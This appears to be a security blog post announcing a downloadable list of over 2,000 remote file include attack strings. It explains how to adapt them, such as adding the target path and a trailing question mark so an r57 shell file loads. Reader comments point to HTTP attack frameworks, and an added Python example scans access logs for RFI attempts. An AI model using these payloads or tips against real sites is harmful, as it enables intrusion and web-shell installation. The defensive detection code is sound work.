web application security lab

Large List of RFIs (1000+)

I started on this project over a year ago, and then I stopped, and then I started it again, and then I stopped again, and finally today, I mostly got it finished (or as far as I’m willing to take it for today). I wanted to create a master list of a mess load of RFI (remote file include) attacks. I got the list from various sources and I’m sure I’m missing a ton so yes, if you think there’s some I’ve missed, go ahead and forward them on to me and I’ll add them in.

You can download the full list here (2241 RFIs at the time of writing - after updating).

Because of how I built this, it has a few issues. The first is that it doesn’t take into account the path to the vulnerable function. So if it’s http://www.vulnerable.com/bob/something… you have to add that in. The second is that the trailing question mark is sometimes needed but isn’t included in the string. You may require the additional question mark so that you don’t get /r57.txt.somegarbage but rather /r57.txt?.somegarbage, which will work. So if you use this, you may have to add in your own question marks after your RFI URL. Anyway, thoughts are welcome, and big thanks to the hundreds of people who found these in the first place!
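For defenders, the two caveats above suggest matching on the parameter value rather than on the paths in the list: the install path varies per site, and the trailing question mark is a useful extra signal. The following is an added example, not part of the original post or the list; the log lines, the example.test host and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A parameter value that starts with a remote scheme is the core RFI signal.
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /bob/index.php?page=http://example.test/r57.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] '
    '"GET /view.php?inc=http%3A%2F%2Fexample.test%2Fr57.txt HTTP/1.1" 404 0',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] '
    '"GET /search.php?q=rfi+list HTTP/1.1" 200 900',
]

def rfi_findings(log_line):
    """Return (param, value, trailing_qmark) for each parameter carrying a remote URL."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    # Everything after the first "?" of the request target is the query string,
    # so the install path ("/bob/...") does not affect the match.
    query = urlsplit(m.group(1)).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # second decode catches double-encoded values
        if REMOTE.match(decoded):
            # A trailing "?" turns whatever the application appends
            # (".somegarbage") into a query string on the remote host.
            findings.append((name, decoded, decoded.rstrip().endswith("?")))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value, qmark in rfi_findings(line):
            print(f"param={name} value={value} trailing_qmark={qmark}")
```

Legitimate redirect or callback parameters also carry URLs, so treat a hit as a lead to check against the application's expected parameters rather than as proof of an attempt.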

3 Responses to “Large List of RFIs (1000+)”

  1. I)ruid Says:

    I wrote a framework for such HTTP-based attacks a long, long time ago, and the way you define the attacks handles some of the issues you mention and provides for more flexibility for the user. Perhaps you could script something to turn your list into an attack file for the framework? (:

    http://druid.caughq.org/projects/hcraft/

  2. QUAKERDOOMER Says:

    You can use welf scripting in winAUTOPWN to test a list of exploits.
    http://winautopwn.co.nr

  3. Nos Says:

    It might be possible to do that; however, since the URLs aren’t complete in all the cases, and the question mark might or might not be needed, I wonder how many of those links would actually work… to ask whether he could ‘simply rewrite’ the URLs into full and all done seems like a bit… too much to ask :P

    OT: nice job on this list!